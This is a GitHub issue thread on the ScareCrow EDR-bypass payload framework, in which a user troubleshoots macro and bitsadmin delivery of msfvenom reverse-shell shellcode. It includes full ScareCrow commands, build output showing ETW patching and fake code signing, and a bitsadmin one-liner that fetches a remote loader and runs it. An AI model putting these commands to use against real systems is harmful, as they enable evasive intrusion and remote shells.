optiv / ScareCrow

ScareCrow - Payload creation framework designed around EDR bypass.

Macro delivery #38

Closed Chomikmarkus closed 2 years ago

Chomikmarkus commented 2 years ago

For some reason the macro fails! After generating the loader and js file from msfvenom.bin shellcode:

./ScareCrow -I msfvenom.bin -Loader excel -domain some.tld -url http://some.com -sandbox -O file.js

I host the file on the server provided in the payload and copy the macro from ScareCrow, adding it to the Office 2013 Developer Macro! (The shellcode itself works: when I execute cscript file.js I get shell access.) From Process Hacker I can actually see Excel contact the server URL I provided, but no reverse shell is created! Tried with the excel, msiexec and wscript loaders, so I am assuming that I have made a mistake somewhere!

Chomikmarkus commented 2 years ago

With bits delivery got this error:

/ScareCrow -I x64_reverse_https.bin -Loader dll -domain domain.fi -delivery macro -sandbox -url http://services.events

[ScareCrow ASCII-art banner] (@Tyl0us) “Fear, you must understand is more than a mere obstacle. Fear is a TEACHER. the first one you ever had.”

2021/11/27 11:21:18 Error: Please provide the url the loader will be hosted on in order to generate a delivery command

root@vps158041:/opt/ScareCrow# ./ScareCrow -I x64_reverse_https.bin -Loader excel -sandbox -delivery bits -domain Domain.fi -url http://services.events

[ScareCrow ASCII-art banner] (@Tyl0us) “Fear, you must understand is more than a mere obstacle. Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Patched ETW Enabled
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With Memo's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing Memo.dll With a Fake Cert
[+] Signed File Created
[*] Creating Loader
[*] Bitsadmin
[!] One liner command to execute it: bitsadmin /transfer http://services.events/ %APPDATA%\ & cscript //E: JScript %APPDATA%\ & timeout 20 & del %APPDATA%\
panic: open : no such file or directory

goroutine 1 [running]:
ScareCrow/Utils.check(...)
        /opt/ScareCrow/Utils/Utils.go:76
ScareCrow/Utils.Writefile({0x0, 0x1b}, {0xc001d02000, 0x36d09d})
        /opt/ScareCrow/Utils/Utils.go:68 +0xf7
ScareCrow/Loader.CompileLoader({0x7fffed20d6fc, 0x5}, {0x0, 0xaec00}, {0xc000130060, 0x8}, {0x6ede4b, 0x4}, {0x7fffed20d715, 0x4}, ...)
        /opt/ScareCrow/Loader/Loader.go:1040 +0xd05
main.main()
        /opt/ScareCrow/ScareCrow.go:201 +0xb6c
root@vps158041:/opt/ScareCrow#

root@vps158041:/opt/ScareCrow# go version
go version go1.17.3 linux/amd64
root@vps158041:/opt/ScareCrow#

Tylous commented 2 years ago

Hello, given the error message and your command, you're missing the -O for the output file. Try adding -O test.js

Chomikmarkus commented 2 years ago

Figured it already out! Thanks

Chomikmarkus commented 2 years ago

But macro delivery still fails: it makes a connection to where the .js loader is hosted, but no session is created.